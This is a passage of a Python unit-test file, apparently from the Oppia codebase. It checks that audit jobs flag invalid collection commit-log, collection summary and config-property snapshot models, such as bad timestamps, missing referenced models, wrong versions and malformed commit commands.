                'collection-1-1'))
        self.model_instance_2 = (
            collection_models.CollectionCommitLogEntryModel.get_by_id(
                'collection-2-1'))
        self.job_class = (
            prod_validation_jobs_one_off
            .CollectionCommitLogEntryModelAuditOneOffJob)

    def test_standard_operation(self):
        """Checks that all entries (including one added by an extra update
        commit) validate cleanly.
        """
        collection_services.update_collection(
            self.owner_id, '0', [{
                'cmd': 'edit_collection_property',
                'property_name': 'title',
                'new_value': 'New title'
            }], 'Changes.')
        expected_output = [
            u'[u\'fully-validated CollectionCommitLogEntryModel\', 5]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """Checks that created_on later than last_updated triggers a
        time-field-relation failure for the modified entry only.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of CollectionCommitLogEntryModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), u'[u\'fully-validated CollectionCommitLogEntryModel\', 3]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """Checks that a mocked (earlier) job-run datetime makes the
        remaining entry fail the current-time check.
        """
        self.model_instance_1.delete()
        self.model_instance_2.delete()
        self.rights_model_instance.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'CollectionCommitLogEntryModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_collection_model_failure(self):
        """Checks that deleting the referenced CollectionModel yields
        collection_ids field-check failures for both of its entries.
        """
        collection_models.CollectionModel.get_by_id('0').delete(
            feconf.SYSTEM_COMMITTER_ID, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for collection_ids '
                'field check of CollectionCommitLogEntryModel\', '
                '[u"Entity id collection-0-1: based on field collection_ids '
                'having value 0, expect model CollectionModel with id 0 '
                'but it doesn\'t exist", u"Entity id collection-0-2: based '
                'on field collection_ids having value 0, expect model '
                'CollectionModel with id 0 but it doesn\'t exist"]]'
            ), u'[u\'fully-validated CollectionCommitLogEntryModel\', 3]']
        run_job_and_check_output(
            self, expected_output, literal_eval=True)

    def test_missing_collection_rights_model_failure(self):
        """Checks that deleting the referenced CollectionRightsModel yields a
        collection_rights_ids field-check failure for the rights entry.
        """
        collection_models.CollectionRightsModel.get_by_id('1').delete(
            feconf.SYSTEM_COMMITTER_ID, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for collection_rights_ids '
                'field check of CollectionCommitLogEntryModel\', '
                '[u"Entity id rights-1-1: based on field '
                'collection_rights_ids having value 1, expect model '
                'CollectionRightsModel with id 1 but it doesn\'t exist"]]'
            ), u'[u\'fully-validated CollectionCommitLogEntryModel\', 3]']
        run_job_and_check_output(
            self, expected_output, sort=True)

    def test_invalid_collection_version_in_model_id(self):
        """Checks that an entry id encoding version 3 fails validation when
        the Collection model is only at version 1.
        """
        model_with_invalid_version_in_id = (
            collection_models.CollectionCommitLogEntryModel.create(
                '0', 3, self.owner_id, self.OWNER_USERNAME, 'edit',
                'msg', [{}],
                constants.ACTIVITY_STATUS_PUBLIC, False))
        model_with_invalid_version_in_id.collection_id = '0'
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for collection model '
                'version check of CollectionCommitLogEntryModel\', '
                '[u\'Entity id %s: Collection model corresponding '
                'to id 0 has a version 1 which is less than '
                'the version 3 in commit log entry model id\']]'
            ) % (model_with_invalid_version_in_id.id),
            u'[u\'fully-validated CollectionCommitLogEntryModel\', 4]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_id(self):
        """Checks that an entry whose id does not match the expected regex
        fails both the model-id check and the commit-cmd check.
        """
        model_with_invalid_id = (
            collection_models.CollectionCommitLogEntryModel(
                id='invalid-0-1', user_id=self.owner_id,
                username=self.OWNER_USERNAME, commit_type='edit',
                commit_message='msg', commit_cmds=[{}],
                post_commit_status=constants.ACTIVITY_STATUS_PUBLIC,
                post_commit_is_private=False))
        model_with_invalid_id.collection_id = '0'
        model_with_invalid_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for model id check of '
                'CollectionCommitLogEntryModel\', '
                '[u\'Entity id %s: Entity id does not match regex pattern\']]'
            ) % (model_with_invalid_id.id), (
                u'[u\'failed validation check for commit cmd check of '
                'CollectionCommitLogEntryModel\', [u\'Entity id invalid-0-1: '
                'No commit command domain object defined for entity with '
                'commands: [{}]\']]'),
            u'[u\'fully-validated CollectionCommitLogEntryModel\', 4]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_commit_type(self):
        """Checks that an unrecognized commit_type fails validation."""
        self.model_instance_0.commit_type = 'invalid'
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for commit type check of '
                'CollectionCommitLogEntryModel\', '
                '[u\'Entity id collection-0-1: Commit type invalid is '
                'not allowed\']]'
            ), u'[u\'fully-validated CollectionCommitLogEntryModel\', 3]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_post_commit_status(self):
        """Checks that an unrecognized post_commit_status fails validation."""
        self.model_instance_0.post_commit_status = 'invalid'
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for post commit status check '
                'of CollectionCommitLogEntryModel\', '
                '[u\'Entity id collection-0-1: Post commit status invalid '
                'is invalid\']]'
            ), u'[u\'fully-validated CollectionCommitLogEntryModel\', 3]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_true_post_commit_is_private(self):
        """Checks that post_commit_is_private=True fails validation when the
        post-commit status is public.
        """
        self.model_instance_0.post_commit_status = (
            feconf.POST_COMMIT_STATUS_PUBLIC)
        self.model_instance_0.post_commit_is_private = True
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for post commit is private '
                'check of CollectionCommitLogEntryModel\', '
                '[u\'Entity id %s: Post commit status is '
                '%s but post_commit_is_private is True\']]'
            ) % (self.model_instance_0.id, feconf.POST_COMMIT_STATUS_PUBLIC),
            u'[u\'fully-validated CollectionCommitLogEntryModel\', 3]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_false_post_commit_is_private(self):
        """Checks that post_commit_is_private=False fails validation when the
        post-commit status is private.
        """
        self.model_instance_0.post_commit_status = (
            feconf.POST_COMMIT_STATUS_PRIVATE)
        self.model_instance_0.post_commit_is_private = False
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for post commit is private '
                'check of CollectionCommitLogEntryModel\', '
                '[u\'Entity id %s: Post commit status is '
                '%s but post_commit_is_private is False\']]'
            ) % (self.model_instance_0.id, feconf.POST_COMMIT_STATUS_PRIVATE),
            u'[u\'fully-validated CollectionCommitLogEntryModel\', 3]']
        run_job_and_check_output(self, expected_output, sort=True)

    # NOTE(review): 'schmea' in this method name is a typo for 'schema',
    # repeated across sibling classes; left unchanged for consistency.
    def test_model_with_invalid_commit_cmd_schmea(self):
        """Checks that commit commands with missing required attributes and
        extra unknown attributes each produce a commit-cmd domain-validation
        failure.
        """
        self.model_instance_0.commit_cmds = [{
            'cmd': 'add_collection_node'
        }, {
            'cmd': 'delete_collection_node',
            'invalid_attribute': 'invalid'
        }]
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for commit cmd '
                'delete_collection_node check of '
                'CollectionCommitLogEntryModel\', '
                '[u"Entity id collection-0-1: Commit command domain validation '
                'for command: {u\'cmd\': u\'delete_collection_node\', '
                'u\'invalid_attribute\': u\'invalid\'} failed with error: '
                'The following required attributes are missing: '
                'exploration_id, The following extra attributes '
                'are present: invalid_attribute"]]'
            ), (
                u'[u\'failed validation check for commit cmd '
                'add_collection_node check of CollectionCommitLogEntryModel\', '
                '[u"Entity id collection-0-1: Commit command domain validation '
                'for command: {u\'cmd\': u\'add_collection_node\'} '
                'failed with error: The following required attributes '
                'are missing: exploration_id"]]'),
            u'[u\'fully-validated CollectionCommitLogEntryModel\', 3]']
        run_job_and_check_output(self, expected_output, sort=True)
class CollectionSummaryModelValidatorTests(test_utils.GenericTestBase):
    """Unit tests for the CollectionSummaryModel audit job."""

    def setUp(self):
        """Creates owner/editor/viewer/contributor users, 6 explorations and
        3 tagged collections with mixed language codes, assigns roles and
        makes one contributor edit, then caches the three summary models and
        the audit job class.
        """
        super(CollectionSummaryModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.signup(USER_EMAIL, USER_NAME)
        self.user_id = self.get_user_id_from_email(USER_EMAIL)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        self.owner = user_services.UserActionsInfo(self.owner_id)
        editor_email = 'user@editor.com'
        viewer_email = 'user@viewer.com'
        contributor_email = 'user@contributor.com'
        self.signup(editor_email, 'editor')
        self.signup(viewer_email, 'viewer')
        self.signup(contributor_email, 'contributor')
        self.editor_id = self.get_user_id_from_email(editor_email)
        self.viewer_id = self.get_user_id_from_email(viewer_email)
        self.contributor_id = self.get_user_id_from_email(contributor_email)
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(6)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        language_codes = ['ar', 'en', 'en']
        collections = [collection_domain.Collection.create_default_collection(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
            objective='objective%d' % i,
            language_code=language_codes[i]
        ) for i in xrange(3)]
        for index, collection in enumerate(collections):
            # Collection i contains explorations 2i and 2i + 1.
            collection.add_node('%s' % (index * 2))
            collection.add_node('%s' % (index * 2 + 1))
            collection.tags = ['math', 'art']
            collection_services.save_new_collection(self.owner_id, collection)
        rights_manager.assign_role_for_collection(
            self.owner, '0', self.editor_id, rights_manager.ROLE_EDITOR)
        # The contributor's edit makes them appear in collection 0's
        # contributors summary.
        collection_services.update_collection(
            self.contributor_id, '0', [{
                'cmd': 'edit_collection_property',
                'property_name': 'title',
                'new_value': 'New title'
            }], 'Changes.')
        rights_manager.assign_role_for_collection(
            self.owner, '2', self.viewer_id, rights_manager.ROLE_VIEWER)
        self.model_instance_0 = (
            collection_models.CollectionSummaryModel.get_by_id('0'))
        self.model_instance_0.put()
        self.model_instance_1 = (
            collection_models.CollectionSummaryModel.get_by_id('1'))
        self.model_instance_2 = (
            collection_models.CollectionSummaryModel.get_by_id('2'))
        self.job_class = (
            prod_validation_jobs_one_off.CollectionSummaryModelAuditOneOffJob)

    def test_standard_operation(self):
        """Checks that all three summaries validate cleanly after a publish
        and an update commit.
        """
        rights_manager.publish_collection(self.owner, '0')
        collection_services.update_collection(
            self.owner_id, '1', [{
                'cmd': 'edit_collection_property',
                'property_name': 'title',
                'new_value': 'New title'
            }], 'Changes.')
        expected_output = [
            u'[u\'fully-validated CollectionSummaryModel\', 3]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """Checks that created_on later than last_updated triggers a
        time-field-relation failure for the modified summary only.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of CollectionSummaryModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), u'[u\'fully-validated CollectionSummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """Checks that a mocked (earlier) job-run datetime makes the
        remaining summary fail the current-time check.
        """
        collection_services.delete_collection(self.owner_id, '1')
        collection_services.delete_collection(self.owner_id, '2')
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'CollectionSummaryModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_collection_model_failure(self):
        """Checks that deleting the backing CollectionModel yields a
        collection_ids field-check failure for its summary.
        """
        collection_model = collection_models.CollectionModel.get_by_id('0')
        collection_model.delete(feconf.SYSTEM_COMMITTER_ID, '', [])
        self.model_instance_0.collection_model_last_updated = (
            collection_model.last_updated)
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for collection_ids '
                'field check of CollectionSummaryModel\', '
                '[u"Entity id 0: based on field collection_ids having '
                'value 0, expect model CollectionModel with id 0 but '
                'it doesn\'t exist"]]'),
            u'[u\'fully-validated CollectionSummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_owner_user_model_failure(self):
        """Checks that deleting an owner's UserSettingsModel yields an
        owner_user_ids field-check failure.
        """
        rights_manager.assign_role_for_collection(
            self.owner, '0', self.user_id, rights_manager.ROLE_OWNER)
        user_models.UserSettingsModel.get_by_id(self.user_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for owner_user_ids '
                'field check of CollectionSummaryModel\', '
                '[u"Entity id 0: based on field owner_user_ids having '
                'value %s, expect model UserSettingsModel with id %s '
                'but it doesn\'t exist"]]') % (self.user_id, self.user_id),
            u'[u\'fully-validated CollectionSummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_editor_user_model_failure(self):
        """Checks that deleting the editor's UserSettingsModel yields an
        editor_user_ids field-check failure.
        """
        user_models.UserSettingsModel.get_by_id(self.editor_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for editor_user_ids '
                'field check of CollectionSummaryModel\', '
                '[u"Entity id 0: based on field editor_user_ids having '
                'value %s, expect model UserSettingsModel with id %s but '
                'it doesn\'t exist"]]') % (
                    self.editor_id, self.editor_id),
            u'[u\'fully-validated CollectionSummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_viewer_user_model_failure(self):
        """Checks that deleting the viewer's UserSettingsModel yields a
        viewer_user_ids field-check failure.
        """
        user_models.UserSettingsModel.get_by_id(self.viewer_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for viewer_user_ids '
                'field check of CollectionSummaryModel\', '
                '[u"Entity id 2: based on field viewer_user_ids having '
                'value %s, expect model UserSettingsModel with id %s but '
                'it doesn\'t exist"]]') % (
                    self.viewer_id, self.viewer_id),
            u'[u\'fully-validated CollectionSummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_contributor_user_model_failure(self):
        """Checks that deleting the contributor's UserSettingsModel yields a
        contributor_user_ids field-check failure.
        """
        user_models.UserSettingsModel.get_by_id(self.contributor_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for contributor_user_ids '
                'field check of CollectionSummaryModel\', '
                '[u"Entity id 0: based on field contributor_user_ids having '
                'value %s, expect model UserSettingsModel with id %s but '
                'it doesn\'t exist"]]') % (
                    self.contributor_id, self.contributor_id),
            u'[u\'fully-validated CollectionSummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_contributors_summary(self):
        """Checks that a contributors_summary whose keys disagree with the
        contributor ids fails validation.
        """
        sorted_contributor_ids = sorted(
            self.model_instance_0.contributors_summary.keys())
        self.model_instance_0.contributors_summary = {'invalid': 1}
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for contributors summary '
                'check of CollectionSummaryModel\', '
                '[u"Entity id 0: Contributor ids: [u\'%s\', u\'%s\'] do '
                'not match the contributor ids obtained using '
                'contributors summary: [u\'invalid\']"]]'
            ) % (sorted_contributor_ids[0], sorted_contributor_ids[1]),
            u'[u\'fully-validated CollectionSummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_node_count(self):
        """Checks that a node_count disagreeing with the collection's actual
        node list fails validation.
        """
        self.model_instance_0.node_count = 10
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for node count check '
                'of CollectionSummaryModel\', '
                '[u"Entity id 0: Node count: 10 does not match the number '
                'of nodes in collection_contents dict: [{u\'exploration_id\': '
                'u\'0\'}, {u\'exploration_id\': u\'1\'}]"]]'
            ), u'[u\'fully-validated CollectionSummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_ratings(self):
        """Checks that non-empty ratings fail validation (while an empty
        ratings dict on another summary passes).
        """
        self.model_instance_0.ratings = {'1': 0, '2': 1}
        self.model_instance_0.put()
        self.model_instance_1.ratings = {}
        self.model_instance_1.put()
        expected_output = [(
            u'[u\'failed validation check for ratings check of '
            'CollectionSummaryModel\', '
            '[u"Entity id 0: Expected ratings for the entity to be empty '
            'but received {u\'1\': 0, u\'2\': 1}"]]'
        ), u'[u\'fully-validated CollectionSummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_collection_related_property(self):
        """Checks that a summary title disagreeing with the collection's
        title fails validation.
        """
        self.model_instance_0.title = 'invalid'
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for title field check of '
                'CollectionSummaryModel\', '
                '[u\'Entity id %s: title field in entity: invalid does not '
                'match corresponding collection title field: New title\']]'
            ) % self.model_instance_0.id,
            u'[u\'fully-validated CollectionSummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_collection_rights_related_property(self):
        """Checks that a summary status disagreeing with the collection
        rights status fails validation.
        """
        self.model_instance_0.status = 'public'
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for status field check of '
                'CollectionSummaryModel\', '
                '[u\'Entity id %s: status field in entity: public does not '
                'match corresponding collection rights status field: '
                'private\']]'
            ) % self.model_instance_0.id,
            u'[u\'fully-validated CollectionSummaryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
class ConfigPropertyModelValidatorTests(test_utils.GenericTestBase):
    """Unit tests for the ConfigPropertyModel audit job."""

    def setUp(self):
        """Commits a 'config_model' property, grabs the pre-existing
        'oppia_csrf_secret' property, and caches the audit job class.
        """
        super(ConfigPropertyModelValidatorTests, self).setUp()
        self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
        self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
        self.model_instance = config_models.ConfigPropertyModel(
            id='config_model', value='c')
        self.model_instance.commit(feconf.SYSTEM_COMMITTER_ID, [])
        self.csrf_model_instance = config_models.ConfigPropertyModel.get_by_id(
            'oppia_csrf_secret')
        self.job_class = (
            prod_validation_jobs_one_off.ConfigPropertyModelAuditOneOffJob)

    def test_standard_operation(self):
        """Checks that both config property models validate cleanly."""
        expected_output = [
            u'[u\'fully-validated ConfigPropertyModel\', 2]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """Checks that created_on later than last_updated triggers a
        time-field-relation failure for the modified model only.
        """
        self.model_instance.created_on = (
            self.model_instance.last_updated + datetime.timedelta(days=1))
        self.model_instance.commit(self.admin_id, [])
        expected_output = [
            (
                u'[u\'failed validation check for time field relation check '
                'of ConfigPropertyModel\', '
                '[u\'Entity id %s: The created_on field has a value '
                '%s which is greater than the value '
                '%s of last_updated field\']]') % (
                    self.model_instance.id,
                    self.model_instance.created_on,
                    self.model_instance.last_updated
                ),
            u'[u\'fully-validated ConfigPropertyModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """Checks that a mocked (earlier) job-run datetime makes the
        remaining model fail the current-time check.
        """
        self.csrf_model_instance.delete(self.admin_id, '', [{}])
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'ConfigPropertyModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance.id, self.model_instance.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_snapshot_metadata_model_failure(self):
        """Checks that deleting the property's snapshot metadata model yields
        a snapshot_metadata_ids field-check failure.
        """
        config_models.ConfigPropertySnapshotMetadataModel.get_by_id(
            'config_model-1').delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_metadata_ids '
                'field check of ConfigPropertyModel\', '
                '[u"Entity id config_model: based on field '
                'snapshot_metadata_ids having '
                'value config_model-1, expect model '
                'ConfigPropertySnapshotMetadataModel '
                'with id config_model-1 but it doesn\'t exist"]]'),
            u'[u\'fully-validated ConfigPropertyModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_snapshot_content_model_failure(self):
        """Checks that deleting the property's snapshot content model yields
        a snapshot_content_ids field-check failure.
        """
        config_models.ConfigPropertySnapshotContentModel.get_by_id(
            'config_model-1').delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_content_ids '
                'field check of ConfigPropertyModel\', '
                '[u"Entity id config_model: based on field '
                'snapshot_content_ids having '
                'value config_model-1, expect model '
                'ConfigPropertySnapshotContentModel '
                'with id config_model-1 but it doesn\'t exist"]]'),
            u'[u\'fully-validated ConfigPropertyModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)
class ConfigPropertySnapshotMetadataModelValidatorTests(
test_utils.GenericTestBase):
    def setUp(self):
        """Commits a 'config_model' property as the admin, creates a
        UserSettingsModel for the system committer, grabs the snapshot
        metadata models for both config properties, and caches the audit
        job class.
        """
        super(ConfigPropertySnapshotMetadataModelValidatorTests, self).setUp()
        self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
        self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
        self.config_model = config_models.ConfigPropertyModel(
            id='config_model', value='c')
        self.config_model.commit(self.admin_id, [])
        user_models.UserSettingsModel(
            id=feconf.SYSTEM_COMMITTER_ID, email='system@committer.com').put()
        self.model_instance = (
            config_models.ConfigPropertySnapshotMetadataModel.get_by_id(
                'config_model-1'))
        self.csrf_model_instance = (
            config_models.ConfigPropertySnapshotMetadataModel.get_by_id(
                'oppia_csrf_secret-1'))
        self.job_class = (
            prod_validation_jobs_one_off
            .ConfigPropertySnapshotMetadataModelAuditOneOffJob)
    def test_standard_operation(self):
        """Checks that all snapshot metadata models (including one from an
        extra commit) validate cleanly.
        """
        self.config_model.commit(self.admin_id, [])
        expected_output = [
            u'[u\'fully-validated ConfigPropertySnapshotMetadataModel\', 3]']
        run_job_and_check_output(self, expected_output)
    def test_model_with_created_on_greater_than_last_updated(self):
        """Checks that created_on later than last_updated triggers a
        time-field-relation failure for the modified model only.
        """
        self.model_instance.created_on = (
            self.model_instance.last_updated + datetime.timedelta(days=1))
        self.model_instance.put()
        expected_output = [
            (
                u'[u\'failed validation check for time field relation check '
                'of ConfigPropertySnapshotMetadataModel\', '
                '[u\'Entity id %s: The created_on field has a value '
                '%s which is greater than the value '
                '%s of last_updated field\']]') % (
                    self.model_instance.id,
                    self.model_instance.created_on,
                    self.model_instance.last_updated),
            u'[u\'fully-validated ConfigPropertySnapshotMetadataModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_last_updated_greater_than_current_time(self):
        """Checks that a mocked (earlier) job-run datetime makes the
        remaining model fail the current-time check.
        """
        self.csrf_model_instance.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'ConfigPropertySnapshotMetadataModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance.id, self.model_instance.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_config_property_model_failure(self):
        """Checks that deleting the referenced ConfigPropertyModel yields
        config_property_ids field-check failures for both of its snapshot
        metadata models.
        """
        self.config_model.delete(self.admin_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for config_property_ids '
                'field check of ConfigPropertySnapshotMetadataModel\', '
                '[u"Entity id config_model-1: based on field '
                'config_property_ids having value config_model, '
                'expect model ConfigPropertyModel with '
                'id config_model but it doesn\'t exist", '
                'u"Entity id config_model-2: based on field '
                'config_property_ids having value config_model, expect model '
                'ConfigPropertyModel with id config_model but it doesn\'t '
                'exist"]]'
            ),
            u'[u\'fully-validated ConfigPropertySnapshotMetadataModel\', 1]']
        run_job_and_check_output(self, expected_output, literal_eval=True)
    def test_missing_committer_model_failure(self):
        """Checks that a snapshot metadata model whose committer's
        UserSettingsModel is missing fails the committer_ids field check.
        """
        user_models.UserSettingsModel.get_by_id(self.admin_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for committer_ids field '
                'check of ConfigPropertySnapshotMetadataModel\', '
                '[u"Entity id config_model-1: based on field committer_ids '
                'having value %s, expect model UserSettingsModel with id %s '
                'but it doesn\'t exist"]]'
            ) % (self.admin_id, self.admin_id),
            u'[u\'fully-validated ConfigPropertySnapshotMetadataModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_invalid_config_property_model_version_in_model_id(self):
        """Checks that a snapshot metadata model whose id encodes a version
        higher than the parent ConfigPropertyModel's version is reported.
        """
        # 'config_model-3' claims version 3, but the parent model is only at
        # version 1.
        model_with_invalid_version_in_id = (
            config_models.ConfigPropertySnapshotMetadataModel(
                id='config_model-3', committer_id=self.admin_id,
                commit_type='edit',
                commit_message='msg', commit_cmds=[{}]))
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for config property model '
                'version check of ConfigPropertySnapshotMetadataModel\', '
                '[u\'Entity id config_model-3: ConfigProperty model '
                'corresponding to id config_model has a version 1 '
                'which is less than the version 3 in '
                'snapshot metadata model id\']]'
            ),
            u'[u\'fully-validated ConfigPropertySnapshotMetadataModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    # NOTE: method name misspells "schema" as "schmea"; kept as-is since test
    # names are referenced by CI history and sibling tests use the same name.
    def test_model_with_invalid_commit_cmd_schmea(self):
        """Checks that commit_cmds failing domain validation (missing
        required attributes, extra attributes) are reported.
        """
        self.model_instance.commit_cmds = [{
            'cmd': 'change_property_value',
            'invalid_attribute': 'invalid'
        }]
        self.model_instance.put()
        expected_output = [
            (
                u'[u\'failed validation check for commit cmd '
                'change_property_value check of '
                'ConfigPropertySnapshotMetadataModel\', '
                '[u"Entity id config_model-1: Commit command domain '
                'validation for command: {u\'cmd\': '
                'u\'change_property_value\', '
                'u\'invalid_attribute\': u\'invalid\'} failed with error: '
                'The following required attributes are missing: '
                'new_value, The following extra attributes are present: '
                'invalid_attribute"]]'
            ), u'[u\'fully-validated ConfigPropertySnapshotMetadataModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)
class ConfigPropertySnapshotContentModelValidatorTests(
        test_utils.GenericTestBase):
    """Audit-job tests for ConfigPropertySnapshotContentModel validation."""

    def setUp(self):
        """Creates a config property (version 1) plus the implicit CSRF
        secret, and caches their snapshot content models.
        """
        super(ConfigPropertySnapshotContentModelValidatorTests, self).setUp()

        self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
        self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)

        self.config_model = config_models.ConfigPropertyModel(
            id='config_model', value='c')
        self.config_model.commit(self.admin_id, [])

        user_models.UserSettingsModel(
            id=feconf.SYSTEM_COMMITTER_ID, email='system@committer.com').put()

        self.model_instance = (
            config_models.ConfigPropertySnapshotContentModel.get_by_id(
                'config_model-1'))
        # Snapshot created as a side effect of test setup; deleted in tests
        # that need a single-entity expected output.
        self.csrf_model_instance = (
            config_models.ConfigPropertySnapshotContentModel.get_by_id(
                'oppia_csrf_secret-1'))

        self.job_class = (
            prod_validation_jobs_one_off
            .ConfigPropertySnapshotContentModelAuditOneOffJob)

    def test_standard_operation(self):
        """All three snapshot content models validate cleanly."""
        self.config_model.commit(self.admin_id, [])
        expected_output = [
            u'[u\'fully-validated ConfigPropertySnapshotContentModel\', 3]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """created_on later than last_updated is a validation failure."""
        self.model_instance.created_on = (
            self.model_instance.last_updated + datetime.timedelta(days=1))
        self.model_instance.put()
        expected_output = [
            (
                u'[u\'failed validation check for time field relation check '
                'of ConfigPropertySnapshotContentModel\', '
                '[u\'Entity id %s: The created_on field has a value '
                '%s which is greater than the value '
                '%s of last_updated field\']]') % (
                    self.model_instance.id,
                    self.model_instance.created_on,
                    self.model_instance.last_updated
                ),
            u'[u\'fully-validated ConfigPropertySnapshotContentModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """last_updated in the (mocked) future is a validation failure."""
        self.csrf_model_instance.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'ConfigPropertySnapshotContentModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
